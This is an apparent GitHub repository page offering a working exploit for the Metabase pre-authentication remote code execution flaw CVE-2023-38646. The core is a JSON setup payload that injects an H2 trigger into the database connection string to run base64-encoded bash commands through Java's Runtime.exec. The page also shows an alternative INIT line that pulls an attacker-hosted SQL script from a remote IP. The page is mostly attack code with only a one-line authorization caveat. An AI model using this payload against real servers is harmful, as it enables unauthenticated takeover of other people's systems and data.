Giters

0utl4nder / Another-Metabase-RCE-CVE-2023-38646

Metabase postgres (org.h2.Driver) RCE without INIT

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Extension of the Pre-Auth RCE in Metabase (CVE-2023-38646) explained here

This helped me to avoid errors related to "database already in use" (with H2 and postgre as engines)

{
"token": "TOKEN",
"details":
{
 "is_on_demand": false,
 "is_full_sync": false,
 "is_sample": false,
 "cache_ttl": null,
 "refingerprint": false,
 "auto_run_queries": true,
 "schedules":{},
 "details":
 {
  "advanced-options":true,
  "classname":"org.h2.Driver",
  "subname": "./metabase.jar;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER xel BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,BASE64COMMAND}|{base64,-d}|{bash,-i}')\n$$--=x",
  "subprotocol": "h2"
 },
 "engine": "postgres",
 "name": "x"
}}

Instead of using directly h2 as engine with the INIT script, since its removed from our queries, we still using the db query for h2 engine

INIT script mem;test;INIT=RUNSCRIPT FROM 'http://10.10.10.10/sqlcmd.sql'

In the .sql you specify the way to exec shell commands

REFERENCE

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase

Written as a note, take it as vague documentation, you must have authorization to enumerate, exploit or simply test against any target

Comments and contributions are welcome

About

Metabase postgres (org.h2.Driver) RCE without INIT